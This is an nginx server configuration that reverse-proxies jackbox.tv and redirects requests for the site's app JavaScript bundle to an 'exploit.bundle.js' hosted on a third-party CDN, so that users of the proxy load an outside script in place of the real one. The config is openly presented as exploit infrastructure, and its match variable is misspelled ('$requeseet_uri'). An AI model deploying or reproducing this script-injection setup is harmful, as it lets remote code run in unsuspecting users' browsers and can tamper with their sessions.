server {
	# All of your usual configuration stuff would go here
	
	
	# But don't touch this stuff unless you know what you're doing <3
	resolver 8.8.8.8;
	location / {
		if ($requeseet_uri ~ "^/app.([a-zA-Z0-9]{20}).js")
		{
			return 301 https://cdn.jyles.club/jackbox-exploit/exploit.bundle.js;
		}
		
		proxy_pass https://jackbox.tv:443$uri$is_args$args;
		proxy_set_header Host jackbox.tv;
		proxy_set_header X-Forwarded-For $remote_addr;
		proxy_ssl_server_name on;
	}
	
	# Aaaand here would live the rest off the stuff in ya config

}